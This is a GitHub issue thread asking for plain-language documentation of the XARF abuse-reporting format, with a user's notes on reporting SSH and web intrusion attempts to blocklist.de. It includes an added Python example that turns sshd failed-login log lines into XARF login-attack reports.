Create documentation #28
Comments
It would indeed be appreciated to have clear documentation in English rather than just in JSON. Besides, apart from readability, "everything you need to know about the protocol" is more than what's on the wire or what can be expressed in JSON (take a look at any random RFC for examples). (I am considering writing an XARF generator for the intrusion detection system I'm building. Currently, I'm sending the logs of SSH login attacks to Blocklist.de, and have them do the hard work of submitting it as XARF reports, so a lot of thanks to them.)
Hi IByte, just wanted to let you know about news from today: If you want, please reach out to us directly and we will be happy to work with you and get you into an early adopter stage for the new things we are planning to do with blocklist.de.
Hello Tobias, yes, I am interested in seeing new features on blocklist.de to make abuse reporting more convenient. I should note that I am a home (i.e. not corporate) user, albeit with a computer science degree. The advantage of being the only legitimate user of my server from an abuse detection point of view is that it greatly simplifies telling the good traffic from the bad. The intrusion detection software I'm working on focuses mainly on web traffic, essentially turning it into a honeypot for any web application that isn't actually installed (which is most things), and sends reports about it to IP blocklists. It also incorporates the SSH bans database from fail2ban and sends these to blocklist.de. While I'm on the subject, is there a XARF reporting type for these types of web-based abuse, e.g. directory traversal attempts, remote code execution and/or trying to download shellcode or trying 251 different ways of saying "phpMyAdmin" to see whether it is on the server? A few examples of the things I'd like to report (edited for brevity):
To expand on that subject and return to the original topic of this issue, although I found fail2ban's sample implementation of XARF reporting at https://github.com/fail2ban/fail2ban/blob/master/config/action.d/xarf-login-attack.conf rather informative, as I said earlier, both that and the contents of this repository focus largely on syntax and not so much on semantics, or in plain English, what does it actually mean? When are you supposed to use what kind of reporting type, for instance? The schema files currently don't offer a lot more than a repetition of the type name on that subject.
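The two comments above (the one considering a XARF generator for SSH login attacks, and the one pointing at fail2ban's xarf-login-attack action) describe the pipeline but not the code. The following is an added example, not code from this repository, from fail2ban or from either commenter: it parses constructed sshd log lines, groups failed password attempts by source address, and emits one login-attack report per source in the XARF 0.2 header-plus-attachment layout that fail2ban's sample action uses. The header names follow that layout; the schema URL, the `User-Agent` string, the reporter address and the report threshold are assumptions chosen for the example and should be checked against the schema files in this repository before anything is sent anywhere. The threshold exists so that a single mistyped password by the server's own user is never reported, and only failed-login lines are attached, never successful ones.

```python
"""Build XARF 0.2-style login-attack reports from sshd log lines (added example)."""
import re
import uuid
from collections import defaultdict
from datetime import datetime, timezone
from email.utils import format_datetime

# Assumption: schema URL for the login-attack report type. Verify against the
# repository's schema files; it is a placeholder here.
SCHEMA_URL = "http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json"
REPORTER_SOFTWARE = "example-ids/0.1"  # hypothetical reporter name, not a real product
EXAMPLE_TIME = datetime(2024, 3, 14, 2, 15, tzinfo=timezone.utc)  # fixed for reproducibility

# Constructed sshd syslog lines for demonstration; none of these are from the issue.
# 203.0.113.45 / 198.51.100.7 / 192.0.2.10 are documentation-reserved addresses.
SAMPLE_LOG = """\
Mar 14 02:11:07 srv sshd[4123]: Failed password for invalid user admin from 203.0.113.45 port 51022 ssh2
Mar 14 02:11:09 srv sshd[4123]: Failed password for invalid user admin from 203.0.113.45 port 51022 ssh2
Mar 14 02:11:14 srv sshd[4130]: Failed password for root from 203.0.113.45 port 51040 ssh2
Mar 14 02:12:01 srv sshd[4140]: Accepted publickey for ibyte from 192.0.2.10 port 40022 ssh2
Mar 14 02:13:37 srv sshd[4151]: Failed password for invalid user test from 198.51.100.7 port 38761 ssh2
"""

# Matches only "Failed password" lines; successful logins never reach a report.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[0-9a-fA-F:.]+) port (?P<port>\d+)"
)


def parse_failed_logins(log_text):
    """Return {source_ip: [{"line", "user", "port"}, ...]} for failed-password lines."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            events[m["ip"]].append(
                {"line": line, "user": m["user"], "port": int(m["port"])}
            )
    return dict(events)


def build_xarf_report(source_ip, events, reported_from, service="ssh",
                      dest_port=22, when=None, threshold=3):
    """Return (headers, attachment) for one source, or None below the threshold.

    The threshold keeps a legitimate user's occasional typo out of the report;
    three failures within one log excerpt is the assumed cut-off here.
    """
    if len(events) < threshold:
        return None
    when = when or datetime.now(timezone.utc)
    headers = {
        "Schema-URL": SCHEMA_URL,
        "Version": "0.2",
        "User-Agent": REPORTER_SOFTWARE,
        "Date": format_datetime(when),        # RFC 2822 date, as in mail headers
        "Source-Type": "ip-address",
        "Source": source_ip,
        "Port": dest_port,                     # the attacked service port, not the client's
        "Report-Type": "login-attack",
        "Report-ID": f"{uuid.uuid4()}@example.org",
        "Category": "abuse",
        "Service": service,
        "Attachment": "text/plain",
        "Reported-From": reported_from,
    }
    attachment = "\n".join(e["line"] for e in events) + "\n"
    return headers, attachment


def render_report(headers, attachment):
    """Render as 'Key: value' header lines, a blank line, then the log evidence."""
    head = "\n".join(f"{k}: {v}" for k, v in headers.items())
    return f"{head}\n\n{attachment}"


def reports_for_log(log_text, reported_from, **kw):
    """Whole pipeline: one rendered report per source address above the threshold."""
    out = {}
    for ip, events in parse_failed_logins(log_text).items():
        built = build_xarf_report(ip, events, reported_from, **kw)
        if built:
            out[ip] = render_report(*built)
    return out


if __name__ == "__main__":
    for ip, text in reports_for_log(SAMPLE_LOG, "abuse@example.org").items():
        print(text)
```

Run as-is, this prints a single report for 203.0.113.45 (three failures) and none for 198.51.100.7 (one failure), with the three offending log lines as the attachment. Feeding it real fail2ban output means reading the fail2ban ban log or journal instead of `SAMPLE_LOG`; the header set and threshold logic stay the same.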
Currently xarf is mainly documented via the schema itself and description fields. That's not really comfortable to read. I think the most commonly used resource when using xarf right now are the samples.
We should create a detailed documentation clarifying what the fields mean, what is required, etc.